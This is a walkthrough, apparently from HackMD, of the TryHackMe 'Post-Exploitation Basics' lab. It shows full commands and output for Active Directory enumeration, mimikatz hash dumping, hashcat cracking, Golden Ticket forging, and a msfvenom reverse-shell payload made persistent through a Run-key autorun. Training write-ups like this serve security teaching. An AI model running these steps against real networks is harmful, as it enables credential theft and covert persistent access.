Try   HackMD

TryHackMe - Post-Exploitation Basics Walkthrough

This room covers basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom, created by Cryillic.

This room covers:

  • Task 1 : Introduction
  • Task 2 : Enumeration w/ Powerview
  • Task 3 : Enumeration w/ Bloodhound
  • Task 4 : Dumping hashes w/ mimikatz
  • Task 5 : Golden Ticket Attacks w/ mimikatz
  • Task 6 : Enumeration w/ Server Manager
  • Task 7 : Maintaining Access

Task 1: Introduction

This room on TryHackME covers the basics of post-exploitation, after gaining acces to an Active Directory AD machine.

Enumeration of this will use tools such as powerview mimikatz and bloodhound. We will dump password hashes and golden tickets using mimikatz, gather information from the windows server then use metasploit to gain persistency into the machine.

Task 2 : Enumeration w/ Powerview

To start the room we can use RDP or SSH into the machine with the credentials:

  • Username: Administrator
  • Password: P@$$W0rd
  • Domain Name: CONTROLLER

Powerview

This is a powerful powershell script that can be used for enumerating a domain after you have gained a shell in the system.
We can download PowerView from here as PowerView.ps1

  1. Start Powershell using powershell -ep bypass . -ep bypasses the execution policy of powershell allowing you to easily run scripts.
  2. Start PowerView - . .\Downloads\PowerView.ps1
  3. Enumerate the domain users - Get-NetUser | select cn
    Image Not Showing Possible Reasons
    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported
    Learn More →
  4. Enumerate the domain groups - Get-NetGroup -GroupName *admin*

Questions

  1. What is the shared folder that is not set by default? Share

  2. What operating system is running inside of the network besides Windows Server 2019? Windows 10 Enterprise Evaluation

  3. I’ve hidden a flag inside of the users find it. POST{P0W3RV13W_FTW}

Task 3: Enumeration w/ Bloodhound

Bloodhound is a graphical interface that allows you to visually map out the network.

This tool together with [SharpHound](https://github.com/BloodHoundAD/SharpHound) takes the user, groups, trusts, etc of the network and collects them into .json files to be used inside Bloodhound.

BloodHound Installation

  1. sudo apt install bloodhound
  2. sudo neo4j console

Getting loot w/ SharpHound

  1. powershell -ep bypass
  2. . .\Downloads\SharpHound.ps1
  3. Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip   
----------------------------------------------- 
Initializing SharpHound at 5:37 AM on 8/11/2022 
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL    
[+] Cache File not Found: 0 Objects in cache 

[+] Pre-populating Domain Controller SIDS 
Status: 0 objects finished (+0) -- Using 72 MB RAM 
Status: 66 objects finished (+66 33)/s -- Using 80 MB RAM 
Enumeration finished in 00:00:02.2222608 
Compressing data to C:\Users\Administrator\20220811053745_loot.zip
You can upload this file directly to the UI 

SharpHound Enumeration Completed at 5:37 AM on 8/11/2022! Happy Graphing!

Transfer the loot zip file to our attacking machine using scp if connected using ssh

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> scp Administrator@10.10.11.93:20220811025924_loot.zip 20220811025924_loot.zip
Administrator@10.10.11.93's password: 
20220811025924_loot. 100% 9539     9.3KB/s   00:01

I experienced issues while running the zip file as bloodhound was reporting bad json. I therefore uploaded the latest version of sharphound as below and used it to get our loot.

┌─[kali@kali] - [~/tools/BloodHound/Collectors]
└─[$] <> scp SharpHound.exe Administrator@10.10.72.5:SharpHound.exe 
Administrator@10.10.72.5's password: 
SharpHound.exe

PS C:\Users\Administrator> . .\SharpHound.exe  --collectionmethods All --domain CONTROLLER.local --zipfilename loot.zip
2022-08-11T06:37:58.3852711-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-08-11T06:37:58.5571459-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 
2022-08-11T06:37:58.5727475-07:00|INFORMATION|Initializing SharpHound at 6:37 AM on 8/11/2022
2022-08-11T06:37:58.9165260-07:00|INFORMATION|Loaded cache with stats: 62 ID to type mappings. 
 63 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2022-08-11T06:37:58.9321453-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 
2022-08-11T06:37:59.1040229-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-08-11T06:37:59.1508947-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-08-11T06:38:29.1821539-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2022-08-11T06:38:42.5271796-07:00|INFORMATION|Consumers finished, closing output channel
2022-08-11T06:38:42.5583848-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-08-11T06:38:42.6521887-07:00|INFORMATION|Status: 104 objects finished (+104 2.418605)/s -- Using 42 MB RAM
2022-08-11T06:38:42.6521887-07:00|INFORMATION|Enumeration finished in 00:00:43.5858822
2022-08-11T06:38:42.7303070-07:00|INFORMATION|Saving cache with stats: 62 ID to type mappings.
 64 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2022-08-11T06:38:42.7459344-07:00|INFORMATION|SharpHound Enumeration Completed at 6:38 AM on 8/11/2022! Happy Graphing!

Now we can analyze successfully with Bloodhound

Mapping the network w/ BloodHound

First off we need to start up neo4j before starting Bloodhound in another terminal.

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] sudo neo4j console

Enter the default credentials for neo4j as neo4j:neo4j on the site that opens up at http://localhost:7474/browser/ login then change the creds to anything you wish as prompted.

Next up launch bloodhound.

Use the Import Graph option or directly drag and drop the zip file onto bloodhound for further analysis.

We can then choose any query we want.

Questions

  1. What service is also a domain admin? SQLSERVICE

  2. What two users are Kerberoastable? SQLSERVICE,KRBTGT

Task 4 : Dumping hashes w/ mimikatz

Mimikatz is a popular and powerful exploitation tool used for dumping user credentials inside of an active directory network.

We will dump the NTLM hashes with mimikatz and then cracking those hashes using hashcat.

Dump Hashes

Launch Mimikatz from the \Downloads directory and run privilege::debug to ensure that you’re running mimikatz as an administrator, if not mimikatz does not run properly.


Dump the hashes using lsadump::lsa /patch

mimikatz # lsadump::lsa /patch 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000451 (1105)
User : Admin2 
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0

RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a

RID  : 00000454 (1108)
User : POST
LM   :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2

RID  : 00000457 (1111)
User : sshd
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM   :
NTLM : 7bb0c59ff58520b2e3ef7d95d294b1a4

RID  : 00000455 (1109)
User : DESKTOP-2$
LM   :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c

RID  : 00000456 (1110)
User : DESKTOP-1$
LM   :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a

Cracking the hashes w/ hashcat

For this, we can use rockyou.txt wordlist with the command:

hashcat -m 1000 hash.txt /path/to/rockyou.txt

Questions:

  1. What is the Machine1 password? Password1

    ​​​​┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation] 
​​​​└─[$] <> hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
​​​​hashcat (v6.2.5) starting
​​​​
​​​​OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
​​​​============================================================================================================================================
​​​​* Device #1: pthread-Intel(R) Core(TM) i7-4600U CPU @ 2.10GHz, 2917/5899 MB (1024 MB allocatable), 4MCU
​​​​
​​​​Minimum password length supported by kernel: 0
​​​​Maximum password length supported by kernel: 256
​​​​
​​​​Hashes: 1 digests; 1 unique digests, 1 unique salts
​​​​Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
​​​​Rules: 1
​​​​
​​​​Optimizers applied:
​​​​* Zero-Byte
​​​​* Early-Skip
​​​​* Not-Salted
​​​​* Not-Iterated
​​​​* Single-Hash
​​​​* Single-Salt
​​​​* Raw-Hash
​​​​
​​​​ATTENTION! Pure (unoptimized) backend kernels selected.
​​​​Pure kernels can crack longer passwords, but drastically reduce performance.
​​​​If you want to switch to optimized kernels, append -O to your commandline.
​​​​See the above message to find out about the exact limits.
​​​​
​​​​Watchdog: Temperature abort trigger set to 90c
​​​​
​​​​Host memory required for this attack: 1 MB
​​​​
​​​​Dictionary cache hit:
​​​​* Filename..: /usr/share/wordlists/rockyou.txt
​​​​* Passwords.: 14344385
​​​​* Bytes.....: 139921507
​​​​* Keyspace..: 14344385
​​​​
​​​​64f12cddaa88057e06a81b54e73b949b:Password1                
​​​​                                                          
​​​​Session..........: hashcat
​​​​Status...........: Cracked
​​​​Hash.Mode........: 1000 (NTLM)
​​​​Hash.Target......: 64f12cddaa88057e06a81b54e73b949b
​​​​Time.Started.....: Thu Aug 11 11:42:26 2022 (0 secs)
​​​​Time.Estimated...: Thu Aug 11 11:42:26 2022 (0 secs)
​​​​Kernel.Feature...: Pure Kernel
​​​​Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
​​​​Guess.Queue......: 1/1 (100.00%)
​​​​Speed.#1.........:  1508.0 kH/s (0.25ms) @ Accel:512 Loops:1 Thr:1 Vec:8
​​​​Recovered........: 1/1 (100.00%) Digests
​​​​Progress.........: 4096/14344385 (0.03%)
​​​​Rejected.........: 0/4096 (0.00%)
​​​​Restore.Point....: 2048/14344385 (0.01%)
​​​​Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
​​​​Candidate.Engine.: Device Generator
​​​​Candidates.#1....: slimshady -> oooooo
​​​​Hardware.Mon.#1..: Util: 29%
​​​​
​​​​Started: Thu Aug 11 11:42:25 2022
​​​​Stopped: Thu Aug 11 11:42:31 2022

  2. What is the Machine2 Hash? c39f2beb3d2ec06a62cb887fb391dee0

    ​​​​RID  : 00000454 (1108)
​​​​User : POST
​​​​User : Machine2
​​​​LM   :
​​​​NTLM : c39f2beb3d2ec06a62cb887fb391dee0

Task 5 : Golden Ticket Attacks w/ mimikatz

A Golden Ticket attack is a type of attack in which an adversary gains control over an Active Directory Key Distribution Service Account (KRBTGT), and uses that account to forge valid Kerberos Ticket Granting Tickets (TGTs).

From this definition and the previous hashdump that we got, there’s a krbtgt hash.

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

Having the SID and NTLM hash for the krbtgt account will therefore enable us to crease a custom TGT which is the Golden Ticket, therefore allowing us to use any machine or account in the AD network.

With the running mimikatz process running we can run the following but incase you closed it run the following first:

mimikatz # privilege::debug 
Privilege '20' OK

Then proceed to dump the hash of krbtgt:

mimikatz # lsadump::lsa /inject /name:krbtgt 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf 
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

 * WDigest
    01  49a8de3b6c7ae1ddf36aa868e68cd9ea
    02  7902703149b131c57e5253fd9ea710d0
    03  71288a6388fb28088a434d3705cc6f2a
    04  49a8de3b6c7ae1ddf36aa868e68cd9ea
    05  7902703149b131c57e5253fd9ea710d0
    06  df5ad3cc1ff643663d85dabc81432a81 
    07  49a8de3b6c7ae1ddf36aa868e68cd9ea
    08  a489809bd0f8e525f450fac01ea2054b
    09  19e54fd00868c3b0b35b5e0926934c99
    10  4462ea84c5537142029ea1b354cd25fa
    11  6773fcbf03fd29e51720f2c5087cb81c
    12  19e54fd00868c3b0b35b5e0926934c99
    13  52902abbeec1f1d3b46a7bd5adab3b57
    14  6773fcbf03fd29e51720f2c5087cb81c
    15  8f2593c344922717d05d537487a1336d
    16  49c009813995b032cc1f1a181eaadee4
    17  8552f561e937ad7c13a0dca4e9b0b25a
    18  cc18f1d9a1f4d28b58a063f69fa54f27 
    19  12ae8a0629634a31aa63d6f422a14953
    20  b6392b0471c53dd2379dcc570816ba10
    21  7ab113cb39aa4be369710f6926b68094
    22  7ab113cb39aa4be369710f6926b68094
    23  e38f8bc728b21b85602231dba189c5be
    24  4700657dde6382cd7b990fb042b00f9e
    25  8f46d9db219cbd64fb61ba4fdb1c9ba7
    26  36b6a21f031bf361ce38d4d8ad39ee0f
    27  e69385ee50f9d3e105f50c61c53e718e
    28  ca006400aefe845da46b137b5b50f371
    29  15a607251e3a2973a843e09c008c32e3

 * Kerberos
    Default Salt : CONTROLLER.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 64ef5d43922f3b5d

 * Kerberos-Newer-Keys
    Default Salt : CONTROLLER.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
      aes128_hmac       (4096) : 7eb35bddd529c0614e5ad9db4c798066
      des_cbc_md5       (4096) : 64ef5d43922f3b5d

 * NTLM-Strong-NTOWF
    Random Value : 666caaaaf30081f30211bd7fa445fec4

We can create the Golden ticket using any username apart from the SID, domain name and password hash which must be correct with the krbtgt SID and password hash.

mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 
/krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
User      : Administrator                                                       
Domain    : controller.local (CONTROLLER)                                       
SID       : S-1-5-21-849420856-2351964222-986696166                             
User Id   : 500                                                                 
Groups Id : *513 512 520 518 519                                                
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt                      
Lifetime  : 8/11/2022 11:19:47 AM ; 8/8/2032 11:19:47 AM ; 8/8/2032 11:19:47 AM 
-> Ticket : ticket.kirbi                                                        
                                                                                
 * PAC generated                                                                
 * PAC signed                                                                   
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Use misc::cmd to open a new command prompt with elevated privileges to all machines.

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF6427A43B8

Task 6 : Enumeration w/ Server Manager

Servers are hardly ever logged on unless for maintenance, this gives an easy way for enumeration only using the built in windows features such as the server manager

If you have domain admin you have alot of access to the server manager in order to change trusts, add or remove users, look at groups etc, then this can be a great entry point to find other users with other sensitive information on their machines or find other users on the domain network with access to other networks to pivot to another network.

For this we need to rdp into the server as below:

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> rdesktop -u Administrator -d CONTROLLER 10.10.33.104

Enumerate w/ Server Manager

When we open the server we get a number of options(as below) which we can use to enumerate the server, from adding roles, editing them etc. However these can be flagged by system admins.

Navigate to the tools tab and select the Active Directory Users and Computers.

This brings up a list of all users on the domain as well as some other useful tabs such as groups and computers.


Questions

  1. What tool allows to view the event logs? Event Viewer


  2. What is the SQL Service password? MYpassword123#

Task 7 : Maintaining Access

For this lab, we will use Metasploit for persistence, creating a meterpreter shell on the victims machine which we can connect to even if the machine shuts down.

Other means include, advanced backdoors and rootkits, etc.

Generating a payload w/ msfvenom

We can generate a windows meterpreter reverse_tcp shell which we can transfer to our attackbox.

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT=4444 -f exe -o shell.exe 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> scp shell.exe  Administrator@10.10.242.212:shell.exe
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> scp shell.exe  Administrator@10.10.136.0:shell.exe
Administrator@10.10.136.0's password: 
shell.exe

Once the file is transferred, ssh into the machine and confirm that it was transferred.

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> ssh Administrator@10.10.136.0             
Administrator@10.10.136.0's password: 
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>dir 
 Volume in drive C has no label.                                 
 Volume Serial Number is F83F-6346                               
                                                                 
 Directory of C:\Users\Administrator                             
                                                                 
08/12/2022  01:33 PM    <DIR>          .                         
08/12/2022  01:33 PM    <DIR>          ..                        
05/13/2020  08:01 PM    <DIR>          3D Objects                
05/13/2020  08:01 PM    <DIR>          Contacts                  
05/13/2020  08:01 PM    <DIR>          Desktop                   
05/14/2020  08:27 PM    <DIR>          Documents                 
10/03/2020  08:33 AM    <DIR>          Downloads                 
05/13/2020  08:01 PM    <DIR>          Favorites                 
05/13/2020  08:01 PM    <DIR>          Links                     
05/13/2020  08:01 PM    <DIR>          Music                     
05/13/2020  08:01 PM    <DIR>          Pictures                  
05/13/2020  08:01 PM    <DIR>          Saved Games               
05/13/2020  08:01 PM    <DIR>          Searches                  
08/12/2022  01:33 PM            73,802 shell.exe                 
05/13/2020  08:01 PM    <DIR>          Videos                    
               1 File(s)         73,802 bytes                    
              14 Dir(s)  52,008,374,272 bytes free               
                                                                 
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>

On another terminal launch metasploit using msfconsole command and use exploit/multi/handler to listen to the reverse shell.

Set the LHOST and LPORT

Configure our payload to be a windows meterpreter shell using: set payload windows/meterpreter/reverse_tcp

Then run the exploit fist followed by the shell in our attackbox.

┌─[kali@kali] - [~] 
└─[$] <> msfconsole -q                                                                                
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST IP
LHOST => IP
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on IP:4444 
[*] Sending stage (175686 bytes) to 10.10.136.0
id
[*] Meterpreter session 11 opened (IP:4444 -> 10.10.136.0:49885) at 2022-08-12 16:49:06 -0400

meterpreter >

Our meterpreter listener will recieve an incoming connection, background the shell using bg in order to run the persistence module.

meterpreter > bg
[*] Backgrounding session 11...
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) >

Run the Persistence Module

We will use exploit/windows/local/persistence to send a payload every 10 seconds in defualt.

Set the session to the session that we backgrounded in this case session 11

After which we can run the exploit.

msf6 exploit(windows/local/persistence) > set session 11
session => 11
msf6 exploit(windows/local/persistence) > run

[*] Running persistent module against DOMAIN-CONTROLL via session ID: 11
[+] Persistent VBS script written on DOMAIN-CONTROLL to C:\Users\Administrator\AppData\Local\Temp\AFjTyniKyCbKq.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\HbpPWIFt
[+] Installed autorun on DOMAIN-CONTROLL as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\HbpPWIFt
[*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DOMAIN-CONTROLL_20220812.5441/DOMAIN-CONTROLL_20220812.5441.rc

On running the pesistence module, the old session dies and a new session is spawned.

Awesome!!!

We are done with a section through the AD journey, I do hope you have gotten to learn something with me.

Happy Hacking!!!

Last changed by 
Fraize
CTF Player, Security Researcher && Analyst HackTheBox Kenya Meetup Organizer
1
10041

Read more

Late - Easy

Late is an Easy linux box, let&#x2019;s get to enumeration. Information Gathering &#x250C;&#x2500;&#x2500;(kali&#x327F;kali)-[~/Downloads/ctf/htb/Late] &#x2514;&#x2500;$ export IP=10.10.11.156 &#x250C;&#x2500;&#x2500;(kali&#x327F;kali)-[~/Downloads/ctf/htb/Late] &#x2514;&#x2500;$ nmap $IP Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 07:52 EDT Nmap scan report for 10.10.11.156

Aug 3, 2022
Read more from Fraize
Published on HackMD